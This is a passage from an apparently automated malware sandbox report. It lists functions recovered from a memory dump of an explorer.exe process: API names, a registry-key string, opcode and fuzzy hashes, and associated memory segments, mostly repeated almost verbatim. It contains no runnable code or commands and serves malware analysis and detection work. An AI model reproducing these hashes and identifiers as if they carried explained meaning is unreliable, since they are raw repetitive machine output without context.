                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 381a31de412e7f681f37a309b09687c868bbda3ed45e05af35985796972b0bea
                          • Instruction ID: e7e7c0693232118def57724e9fddeb3edc89d3ef20c24beff4effa37cc135b8e
                          • Opcode Fuzzy Hash: 381a31de412e7f681f37a309b09687c868bbda3ed45e05af35985796972b0bea
                          • Instruction Fuzzy Hash: BC01623A140681CACB39AF36D8903AC3365EB6AF5DF494539CA4D0F685CF71C594CB01
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 011946E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 4005939669-1494669752
                          • Opcode ID: f86ff18f124f9998448d680a47867771b16ecf497ce81cc7c4cb35a6a3ded878
                          • Instruction ID: 475d97daa368123e93db33676b05acc6815ffad59b6b0b470d6db071b563c7a7
                          • Opcode Fuzzy Hash: f86ff18f124f9998448d680a47867771b16ecf497ce81cc7c4cb35a6a3ded878
                          • Instruction Fuzzy Hash: D001F671218B8186EB64DF64F4847CAB7A4F384354F804226E6D842BA8DF7CC146CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFree
                          • String ID:
                          • API String ID: 2012307162-0
                          • Opcode ID: b138ba1aebf1ec8f75ee62ba587d068de580b8eb6777785ceab575a11608a321
                          • Instruction ID: f54d8abdf04a1d3349e75f7c82a9760a527605210ea91c374f0c43b5f919e3c9
                          • Opcode Fuzzy Hash: b138ba1aebf1ec8f75ee62ba587d068de580b8eb6777785ceab575a11608a321
                          • Instruction Fuzzy Hash: 4311E976529A8486D7589F15F48439ABBA0F7C8798F401529FB8E47BA8CF7CC485CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: 0ad523c519bf6b0ddb911887fb408b7bb35983247c1440dd8550a25115891065
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: 0ad523c519bf6b0ddb911887fb408b7bb35983247c1440dd8550a25115891065
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: 16a0aeb059cae2f3d09207e162a8b5b414ae30e5cd5292327763c3b9baa12ebb
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: 16a0aeb059cae2f3d09207e162a8b5b414ae30e5cd5292327763c3b9baa12ebb
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: d73eda59f30ac1fb3b0b4efd5edbe657eb2b2f8eef7f678bec99ab117ac4e254
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: d73eda59f30ac1fb3b0b4efd5edbe657eb2b2f8eef7f678bec99ab117ac4e254
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 88dffc6a1b81ce04bfca87e42085a62a92b242d294944086ba8cc77f43fc57f9
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: 88dffc6a1b81ce04bfca87e42085a62a92b242d294944086ba8cc77f43fc57f9
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 071ec3ee98c63fbac2543c53b144c79b050ce75277ae2af07826768c390415da
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: 071ec3ee98c63fbac2543c53b144c79b050ce75277ae2af07826768c390415da
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: fe83e434bb21f8b47625b133ee357315dbef1f0c2e12580fe1cd2892aaf91b30
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: fe83e434bb21f8b47625b133ee357315dbef1f0c2e12580fe1cd2892aaf91b30
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: cad900d789a40a9619eb8a84c31abfdaddefd0efb2762fffc6044bd3b6a371bc
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: cad900d789a40a9619eb8a84c31abfdaddefd0efb2762fffc6044bd3b6a371bc
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 6290d7383921826c2fb2153af05a94dd3d68b95febe418c75b29594f5142ad3d
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 6290d7383921826c2fb2153af05a94dd3d68b95febe418c75b29594f5142ad3d
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 7b6153c6be145777827cd8c3fb034296d5dca575c3959cca0c07ce944510a9db
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 7b6153c6be145777827cd8c3fb034296d5dca575c3959cca0c07ce944510a9db
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: af4a35e4e4abec3209dc8fb34bcfc3cca6138c75e85fc8755ee537a112a803e6
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: af4a35e4e4abec3209dc8fb34bcfc3cca6138c75e85fc8755ee537a112a803e6
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 6fcbe49abc170e1c91c6467c457cb6c13931c4070732e08da6ef8548becb2af1
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 6fcbe49abc170e1c91c6467c457cb6c13931c4070732e08da6ef8548becb2af1
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 40ee07639c3be5b75497e6e884ebfb5705d9c6f6f58fa0c4bf9a654f76376cd9
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 40ee07639c3be5b75497e6e884ebfb5705d9c6f6f58fa0c4bf9a654f76376cd9
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: cc0291f771db6060459dd180bd0b9c9a08b45fa3966b5cc9664607b08890a75d
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: cc0291f771db6060459dd180bd0b9c9a08b45fa3966b5cc9664607b08890a75d
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 58d95034212d87b3fa1662d6023566bd8a85bc94c35c32b1f9a0b6e391890324
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 58d95034212d87b3fa1662d6023566bd8a85bc94c35c32b1f9a0b6e391890324
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 5c06d81188742bad334a714b0b921bf5e4e99c4f22570477523bf823b0ebdd76
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 5c06d81188742bad334a714b0b921bf5e4e99c4f22570477523bf823b0ebdd76
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: c5846185c44490f6f6e74aef4564aac99db16b98675db52f260037c00af0082f
                          • Instruction ID: 241c720d9b9d658cb4cfe388411289cbf83877093b198c5aeb112465374cd0cb
                          • Opcode Fuzzy Hash: c5846185c44490f6f6e74aef4564aac99db16b98675db52f260037c00af0082f
                          • Instruction Fuzzy Hash: C9F06775218BC4C2DA29AF21F8943DD6721F7C8B95F404526DA5E43728CE28D489CB41